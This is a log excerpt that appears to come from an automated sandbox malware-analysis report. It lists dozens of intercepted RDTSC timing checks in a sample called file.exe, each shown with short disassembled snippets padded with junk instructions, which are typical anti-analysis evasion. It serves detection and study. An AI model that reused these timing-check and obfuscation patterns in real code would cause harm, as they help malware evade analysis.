                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60FD8E second address: 60FD9E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F91A0D1A3D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 697127 second address: 69712B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69712B second address: 697146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007F91A0D1A3DEh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 697146 second address: 697151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 697151 second address: 697155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64893D second address: 64894B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F91A12E52FCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64894B second address: 6489C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ebx 0x00000007 jmp 00007F91A0D1A3E4h 0x0000000c pop ebx 0x0000000d nop 0x0000000e mov di, 1D5Bh 0x00000012 mov ebx, dword ptr [ebp+12489977h] 0x00000018 cmc 0x00000019 add eax, ebx 0x0000001b push 00000000h 0x0000001d push ebx 0x0000001e call 00007F91A0D1A3D8h 0x00000023 pop ebx 0x00000024 mov dword ptr [esp+04h], ebx 0x00000028 add dword ptr [esp+04h], 00000018h 0x00000030 inc ebx 0x00000031 push ebx 0x00000032 ret 0x00000033 pop ebx 0x00000034 ret 0x00000035 mov dh, C4h 0x00000037 mov di, B178h 0x0000003b nop 0x0000003c pushad 0x0000003d jc 00007F91A0D1A3D8h 0x00000043 pushad 0x00000044 popad 0x00000045 jno 00007F91A0D1A3D8h 0x0000004b popad 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f jng 00007F91A0D1A3E7h 0x00000055 jmp 00007F91A0D1A3E1h 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6489C8 second address: 6489CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6976A5 second address: 6976A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69782A second address: 697853 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A12E52FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F91A12E5300h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 697853 second address: 69789D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F91A0D1A3D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F91A0D1A3E7h 0x00000011 jo 00007F91A0D1A3EBh 0x00000017 jmp 00007F91A0D1A3E5h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F91A0D1A3DAh 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69C1AD second address: 69C1CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A12E5307h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69C1CC second address: 69C1D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69B84C second address: 69B86A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F91A12E5304h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69B9CC second address: 69B9E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0D1A3E0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69BB2A second address: 69BB31 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69BB31 second address: 69BB44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69BB44 second address: 69BB48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69BB48 second address: 69BB6A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F91A0D1A3E0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F91A0D1A3DCh 0x00000011 jp 00007F91A0D1A3D6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69E7FD second address: 69E803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69E803 second address: 69E83C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F91A0D1A3D6h 0x0000000a popad 0x0000000b pushad 0x0000000c jnp 00007F91A0D1A3D6h 0x00000012 jmp 00007F91A0D1A3E3h 0x00000017 jmp 00007F91A0D1A3E1h 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A502E second address: 6A5032 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A55B1 second address: 6A55B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A55B5 second address: 6A55D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F91A12E5303h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A55D2 second address: 6A55EC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007F91A0D1A3DEh 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 je 00007F91A0D1A3D6h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A55EC second address: 6A55F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F91A12E52F6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A5B6A second address: 6A5B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A5B6E second address: 6A5B8B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F91A12E52F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F91A12E52FDh 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A66B9 second address: 6A66CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F91A0D1A3DDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A696C second address: 6A6974 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6974 second address: 6A6978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6978 second address: 6A697E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A81A4 second address: 6A81AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AC962 second address: 6AC96C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F91A12E52F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AC96C second address: 6AC983 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F91A0D1A3DDh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AC983 second address: 6AC9A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A12E5307h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AC9A7 second address: 6AC9AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AC9AC second address: 6AC9B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AC9B1 second address: 6AC9B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ABCF8 second address: 6ABCFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ABCFC second address: 6ABD3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F91A0D1A3D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F91A0D1A3EAh 0x00000012 jmp 00007F91A0D1A3E4h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F91A0D1A3E7h 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ABD3D second address: 6ABD41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ABEBD second address: 6ABECB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 je 00007F91A0D1A3D6h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ABECB second address: 6ABED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ABED1 second address: 6ABED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AC574 second address: 6AC579 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AC709 second address: 6AC729 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0D1A3E8h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AC729 second address: 6AC72D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B1166 second address: 6B116A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B116A second address: 6B1170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B1170 second address: 6B118B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jnc 00007F91A0D1A3D6h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jnp 00007F91A0D1A3D6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B118B second address: 6B118F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B118F second address: 6B11B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0D1A3E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F91A0D1A3E2h 0x0000000f jnp 00007F91A0D1A3D6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B7B15 second address: 6B7B54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F91A12E52F6h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F91A12E52FAh 0x00000010 jnc 00007F91A12E52F6h 0x00000016 popad 0x00000017 push ebx 0x00000018 jns 00007F91A12E52F6h 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 pop ebx 0x00000021 pop edx 0x00000022 pop eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 jmp 00007F91A12E5301h 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B7B54 second address: 6B7B6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F91A0D1A3E8h 0x0000000c jmp 00007F91A0D1A3DCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B7B6E second address: 6B7B72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B7FA3 second address: 6B7FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B7FA7 second address: 6B7FAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B7FAD second address: 6B8001 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0D1A3E9h 0x00000007 push ebx 0x00000008 jg 00007F91A0D1A3D6h 0x0000000e jnl 00007F91A0D1A3D6h 0x00000014 pop ebx 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 pushad 0x00000019 jng 00007F91A0D1A3D6h 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 jmp 00007F91A0D1A3E7h 0x0000002a pushad 0x0000002b popad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8138 second address: 6B813C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B813C second address: 6B814C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F91A0D1A3D6h 0x00000008 jg 00007F91A0D1A3D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B83E7 second address: 6B840B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91A12E5308h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B840B second address: 6B8424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91A0D1A3E1h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B85AD second address: 6B85BA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F91A12E52F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B85BA second address: 6B85F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91A0D1A3E9h 0x00000009 pop ecx 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F91A0D1A3DFh 0x00000011 pushad 0x00000012 jnc 00007F91A0D1A3D6h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B85F6 second address: 6B85FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8743 second address: 6B8749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8749 second address: 6B874E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B874E second address: 6B875E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F91A0D1A3E2h 0x00000008 jnl 00007F91A0D1A3D6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8934 second address: 6B8938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B90E5 second address: 6B90EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B74FA second address: 6B74FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B74FE second address: 6B750B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F91A0D1A3D8h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B750B second address: 6B7532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F91A12E52F6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jnc 00007F91A12E52FCh 0x00000014 je 00007F91A12E52F8h 0x0000001a pushad 0x0000001b push esi 0x0000001c pop esi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C1622 second address: 6C1628 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C1628 second address: 6C162E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C1338 second address: 6C133E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C133E second address: 6C134D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91A12E52FBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D05AB second address: 6D05B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D05B1 second address: 6D05B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D013C second address: 6D0142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DEBBC second address: 6DEBC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DEBC4 second address: 6DEBC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DEBC9 second address: 6DEBCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DEBCE second address: 6DEC0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F91A0D1A3E3h 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e jmp 00007F91A0D1A3DBh 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F91A0D1A3E1h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DEC0A second address: 6DEC21 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F91A12E52FAh 0x00000008 pushad 0x00000009 jnc 00007F91A12E52F6h 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E0467 second address: 6E0477 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F91A0D1A3D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E2F5F second address: 6E2F82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jns 00007F91A12E52FEh 0x0000000b popad 0x0000000c je 00007F91A12E530Ch 0x00000012 push ecx 0x00000013 jnp 00007F91A12E52F6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E2F82 second address: 6E2F8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E2DD6 second address: 6E2DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E2DE1 second address: 6E2DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E2DE5 second address: 6E2E15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A12E5306h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F91A12E5301h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E52C7 second address: 6E52CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
